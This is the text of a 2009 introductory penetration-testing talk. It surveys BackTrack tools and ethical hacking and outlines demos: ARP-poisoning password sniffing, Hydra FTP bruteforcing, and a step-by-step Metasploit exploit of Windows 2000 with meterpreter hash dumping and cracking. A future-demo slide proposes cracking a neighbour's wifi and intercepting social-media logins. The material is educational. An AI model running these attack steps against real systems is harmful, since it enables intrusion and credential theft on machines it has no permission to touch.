Hack Attack!An Introduction to Penetration Testing

Steve Phillips (aka fraktil)2009.12.17 @ SBLUG

Who Am I?● Attended UCSB 2004-2008

– Majored in Math and Philosophy, not CS● Started using Linux in 2001

– Mandrake, then Slackware, then Debian● Applying for penetration testing job in January● Biases/“Preferences”

– Linux > Windoze (duh)– Python > Ruby– Emacs > vi– Debian (and variants) > others

Can Hacking Be Ethical?Or, what is Ethical Hacking?

● Black Hat– Compromises computer systems without permission– Criminal

● White Hat, aka Ethical Hacker– Gets paid to hack – legally (friggin' sweet)– Always gets permission before attacking a system

● Gray Hat– Some combination of Black and White

The Stages of Hackerdom● Script Kiddie (“skiddie”)

– Can only run automated tools– Doesn't understand underlying technology

● Advanced Beginner– Mastered advanced features of many tools– Knows enough programming to create own tools

● C => Python, Ruby (see next slide)● Uberhacker

– Discovers new vulnerabilities (or new types of vulns)– Knows Assembly, C, Python and/or Ruby, SQL– Excellent programmer; writes tools, scripts regularly– Can defend as well as attack (firewalls, IDS, etc)

Programming Languages Used to Create Hacking Tools

● C– Nmap (network mapper, portscanner, more)– Nessus (vulnerability detection)– Wireshark (network sniffer)

● Python– w3af (web app attack framework)– sqlmap (automatic SQL injection)– TheMiddler (session hijacking, targeted pw sniffing)

● Ruby– Metasploit (vuln exploitation, much more)

What About in Back|Track 4?Overall: Tools + Exploits

● File count: find /pentest | grep \\.c$ | wc -l● Line count: cat $(find /pentest | grep \\.c$) | wc -l

● C: 4058 .c files 1,300,000 lines● Python: 2431 .py files 612,000 lines● Ruby: 5468 .rb files 694,000 lines

● 2773 files from Metasploit● 1271 files from Dradis (information organizing, sharing)● 1424 other

● C++: 431 .cpp files 144,000 lines

What About in Back|Track 4?Exploits Only (from exploitdb)

● C– 1321 .c files

● Python– 405 .py files

● Ruby– 146 .rb files

● C++– 110 .cpp files

TIOBE IndexProgramming Language Popularity

Back|Track 4 Categories● Information Gathering

– Email addresses, DNS● Network Mapping● Vulnerability Identification● Web Application Analysis● Radio Network Analysis● Penetration (not that kind)

Back|Track 4 Categories

● Privilege Escalation● Maintaining Access● Digital Forensics● Reverse Engineering● VoIP (Voice over Internet Protocol)● Misc

DEMO: Sniffing Passwordswith Ettercap

● ARP Poisoning for MitM Attack– Associate attacker's MAC with router's IP– Target tries to route traffic through router

● Routes it through attacker instead– Attacker forwards traffic both ways– Attacker can silently watch or inject traffic

● TheMiddler, sslstrip

How Else Can We Get Creds?● Phishing

– Via email● Spear Phishing

– Becoming popular– Very hard to stop

● In-person Social Engineering– Kevin Mitnick is famous for this

● Brute force

DEMO: Bruteforcing FTP

● Using Hydra to bruteforce weak FTP password– Well, really a dictionary attack

DEMO: Pwning Win2k● Create database (or connect to existing)

– db_create [optional_database_name]● Find win2k box using nmap (in metasploit)

– db_nmap -sV -p 135,139,445 xxx.xxx.xxx.0/24● Search Metasploit for win2k exploits

– search 2000● Use exploit w/meterpreter

– use exploit/windows/smb/ms05_039_pnp– set PAYLOAD windows/meterpreter/bind_tcp

● Which parameters still need to be set?– show options

DEMO: Pwning Win2k● Set parameters

– set RHOST [target_ip]● Now we exploit! Can you guess the command?

– exploit● Get hashes

– hashdump– This would be much harder without meterpreter!

● Copy and paste hashes into new text file● Crack hashes with john the ripper

– ./john [file_containing_hashes].txt● Game Over

Why Become an Ethical Hacker?

● Field is growing (see next slide)– New laws, regulations– US government falling behind in cyber security

● You get paid to hack – need I say more?– Banks– Telecoms– Casinos– Foreign countries (for the federal gov't)

How Can I Practice Legally?● Virtualization (VMware, VirtualBox)

– Use virtual images from recent CTF competitions● http://lampsecurity.org/capture-the-flag-6● http://ctf.hcesperer.org/25c3ctf● http://ctf.hcesperer.org/daopen08● http://ctf.hcesperer.org/eh08ctf

● NetWars– Part of government's Cyber Defense Initiative 2009

● DVL: Damn Vulnerable Linux– Purposely misconfigured, exploitable– http://tinyurl.com/dvllinux15

Further ResourcesLearning

● Metasploit– Online Class: http://www.offensive-

security.com/metasploit-unleashed/● Nmap Guide

– http://nmap.org/book/man.html● Security Videos, Tutorials

– http://securitytube.net

Tools Added to Back|TrackExtra Tools I Used

● Metasploit 3.3.2 (updated)● Nmap 5.0 (updated)

● Exploitdb archive (/pentest/exploits/exlpoitdb)

Summary

● Hacking can be ethical● “Computer security” is an oxymoron

– No one is safe● REALLY powerful hacking tools exist● Metasploit is effing dangerous

Future Demos?

● More local fun– Crack neighbor's wifi (WEP)– Exploit remote vuln in DD-WRT firmware– Redirecting traffic using fake DNS server– Intercepting Twitter, Facebook, LinkedIn creds

● More like real pen testing– SQL injection– XSS– Nessus scan

Contact Information

● Name: Steve Phillips● New Blog: SweetHack.blogspot.com● Email: fraktil@gmail.com● Twitter: twitter.com/fraktil● LinkedIn: linkedin.com/in/sdphillips● IRC: fraktil in #sblug on borg-cube.com

Questions?